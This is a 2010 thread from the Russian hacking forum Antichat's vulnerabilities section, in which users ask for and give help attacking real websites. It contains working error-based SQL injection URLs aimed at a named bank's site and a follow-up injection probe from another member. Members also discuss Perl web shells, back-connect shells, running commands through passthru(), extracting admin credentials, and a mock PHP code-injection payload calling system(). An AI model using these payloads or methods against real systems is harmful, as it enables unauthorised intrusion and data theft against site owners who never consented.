ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12361  
Старый 04.04.2010, 21:00
Аватар для Nek1t
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Цитата:
проблема скорее всего именно в нехватке прав
Так через perl test.pl все работает, так что, думаю, не в правах дело.
Цитата:
попробуй найти что-нибудь кроме /var/www/cgi-bin
Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
 
Ответить с цитированием

  #12362  
Старый 04.04.2010, 21:04
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

http://ashtarakkat.com/en/products/showProduct/63/
и зделаю так..

http://ashtarakkat.com/en/products/showProduct/63%27
скаjите поjaлуста ето sql ??

и как зделать ??
 
Ответить с цитированием

  #12363  
Старый 04.04.2010, 21:05
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от Nek1t  
Так через perl test.pl все работает, так что, думаю, не в правах дело.

Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
не путай perl test.pl и запуск perl-скрипта из веба, абсолютно разные вещи.

PS: perl test.pl будет работать в любых .*nix, если админ не изврашенец
 
Ответить с цитированием

  #12364  
Старый 04.04.2010, 21:10
Аватар для budden
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

Цитата:
Сообщение от Nek1t  
Так через perl test.pl все работает, так что, думаю, не в правах дело.

Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
А зачем тебе вообще перловый вебшелл? Не хватит обычного перлового бекконнекта, а затем уже ручками полазить/посмотреть?
 
Ответить с цитированием

  #12365  
Старый 04.04.2010, 21:21
Аватар для Nek1t
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Цитата:
ручками полазить/посмотреть
Ручками я и сейчас могу через passthru(), но на это уйдет много времени. ls, cat и т.д. - это, конечно, гибко, но не удобно.
 
Ответить с цитированием

  #12366  
Старый 04.04.2010, 22:49
Аватар для FlaktW
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Подскажите можно ли здесь подобрать:

http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+

http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3+union+select+ 3+union+select+3+union+select+3+union+select+3+uni on+select+3+union+select+3+union+select+3+union+se lect+3+union+select+3+union+select+3)x+group+by+2+ limit+1)a)+--+

http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( (select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+ limit+1,1),1,64),floor(rand(0)*2)))z)+--+
 
Ответить с цитированием

  #12367  
Старый 04.04.2010, 23:03
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от FlaktW  
Подскажите можно ли здесь подобрать:

http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+

http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3+union+select+ 3+union+select+3+union+select+3+union+select+3+uni on+select+3+union+select+3+union+select+3+union+se lect+3+union+select+3+union+select+3)x+group+by+2+ limit+1)a)+--+

http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( (select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+ limit+1,1),1,64),floor(rand(0)*2)))z)+--+
Код:
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+or+1=1+and+substring(version(),1,1)=4
для начала
 
Ответить с цитированием

  #12368  
Старый 04.04.2010, 23:32
Аватар для ZeroCold
ZeroCold
Новичок
Регистрация: 09.03.2010
Сообщений: 17
Провел на форуме:
34021

Репутация: 0
По умолчанию

Цитата:
Сообщение от Jokester  
ZeroCold
Если mc=on, то шелл через скуль не залить(кроме отдельных часных случаев), запрос на вывод passwd у тебя правильный, если столбец принтабельный, а ничего не выводится, значит скорее всего нет прав

По поводу загрузки файлов. Вариантов очень много, всё зависит от кода, но может получится и так, что обойти его не получится совсем
Да кавычки фунициклируют, ну да столбец принтабельный таким методом выудил пас и лог от админки, правда по очереди, т.е. в два запроса каждый раз обрашаясь только к первому столбцу за один запрос неполучалось, скуль 4.18, покрайней мере так н мап сказал, другим способом не узнавалось.
Что касается загрузчика то даже не представляю как он выглядит, в смысле его код, на всей странице есть только ява
Код:
<!-- 3function MM_jumpMenu(targ,selObj,restore){ //v3.0 4 eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); 5 if (restore) selObj.selectedIndex=0; 6} 7//-->
но что то мне подсказывает отношения к загрузке это не имеет.
Что касается самой конопки загрузки то фаер баг очень скупо о ней отзываеться
Код:
<input type="file" name="img_mini">
- об окне ввода пути откуда загружать
Код:
<input type="submit" value="Вставить файлы" id="files" name="files">
- собственно кнопка заливки. Есть идеи как это можно проэксплуатировать? )
 
Ответить с цитированием

  #12369  
Старый 05.04.2010, 00:13
Аватар для GivioN
GivioN
Познающий
Регистрация: 30.03.2008
Сообщений: 64
Провел на форуме:
388255

Репутация: 15
По умолчанию

Цитата:
Сообщение от Jokester  
Да, ребяты, даже не знаю что и сказать

Тоесть вот так вот просто, выходим за скобки и кавычки, и выполняем php код, да?
Круто!!!
Получается да. Проверил на локалке все работает

Цитата:
Сообщение от Jokester  
А что тогда скромничать и mysql_query , выполняй уж что-то посерьёзнее =\
А чего тогда скуль раскручивать в гет запросах, хеши какие-то пытаться вытягивать? Не... я просто новичек, может опять чего-то не понимаю

Цитата:
Сообщение от Jokester  
Инновации хек индустрии
Это цветочки... Уже есть идеи как магик.квотес обходить.
 
Ответить с цитированием

  #12370  
Старый 05.04.2010, 00:39
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от GivioN  
Проверил на локалке все работает
А, ну тогда нормально, ты хакер
Цитата:
Сообщение от GivioN  
Это цветочки... Уже есть идеи как магик.квотес обходить.
Да не запаривайся ты. Раз у тебя на локалке работает то, что ты показывал, ломай интырнеты!

Ну сам подумай, вот допустим код:
PHP код:
$id $_GET['id'];
echo 
"$id"
А ты его вот так :
test.php?id=1']; system('ls -la'); // пыщ-пыщ!111

Если тот пример работает, то почему-бы этому не сработать?

Grey: даже особые обстоятельства Пашкелы не сравнятся с новым методом ^_^

Последний раз редактировалось Grey; 05.04.2010 в 01:22..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ